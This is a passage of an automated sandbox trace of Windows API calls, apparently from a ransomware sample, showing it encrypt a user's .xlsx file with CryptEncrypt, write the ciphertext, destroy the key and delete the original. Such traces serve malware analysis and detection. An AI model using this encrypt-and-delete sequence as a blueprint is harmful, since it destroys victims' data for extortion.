hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0077.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0077.455] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0077.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0077.456] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e2650, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2650*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0077.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.458] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.458] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.458] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0077.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0077.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.459] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.461] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x13946, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x13950) returned 1 [0077.461] CharLowerBuffW (in: lpsz="byte[80209]", cchLength=0xb | out: lpsz="byte[80209]") returned 0xb [0077.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.462] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x492ac38*, pdwDataLen=0x144e790*=0x13946, dwBufLen=0x13950 | out: pbData=0x492ac38*, pdwDataLen=0x144e790*=0x13950) returned 1 [0077.472] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.474] WriteFile (in: hFile=0x298, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x13950, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x13950, lpOverlapped=0x0) returned 1 [0077.478] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca6b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.478] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0077.478] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.478] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.479] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.479] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.479] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.479] CloseHandle (hObject=0x258) returned 1 [0077.479] CloseHandle (hObject=0x298) returned 1 [0077.487] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx", lpFilePart=0x0) returned 0x31 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431daa0 [0077.487] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\nwjd3dflnaf4dbf3yn.xlsx")) returned 0x20 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0077.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.488] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.488] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf41dd590, ftCreationTime.dwHighDateTime=0x1d5d3cd, ftLastAccessTime.dwLowDateTime=0x5e6efc80, ftLastAccessTime.dwHighDateTime=0x1d59611, ftLastWriteTime.dwLowDateTime=0x5e6efc80, ftLastWriteTime.dwHighDateTime=0x1d59611, nFileSizeHigh=0x0, nFileSizeLow=0x13946, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="NwJd3dflnaF4DbF3Yn.xlsx", cAlternateFileName="NWJD3D~1.XLS")) returned 0x41ac6c0 [0077.488] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\nwjd3dflnaf4dbf3yn.xlsx")) returned 1 [0077.502] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf41dd590, ftCreationTime.dwHighDateTime=0x1d5d3cd, ftLastAccessTime.dwLowDateTime=0x5e6efc80, ftLastAccessTime.dwHighDateTime=0x1d59611, ftLastWriteTime.dwLowDateTime=0x5e6efc80, ftLastWriteTime.dwHighDateTime=0x1d59611, nFileSizeHigh=0x0, nFileSizeLow=0x13946, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="NwJd3dflnaF4DbF3Yn.xlsx", cAlternateFileName="NWJD3D~1.XLS")) returned 0 [0077.503] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.504] 